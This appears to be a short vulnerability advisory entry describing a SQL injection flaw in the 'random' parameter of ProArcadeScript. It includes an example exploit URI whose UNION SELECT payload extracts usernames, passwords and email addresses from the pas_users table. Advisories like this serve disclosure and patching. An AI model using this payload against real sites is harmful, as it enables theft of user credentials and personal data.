• info
• discussion
• exploit
• solution
• references

ProArcadeScript 'random' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/?random=-2 UNION SELECT 1,2,3,concat(username,char(58),password,char(58),email),5+FROM+pas_users--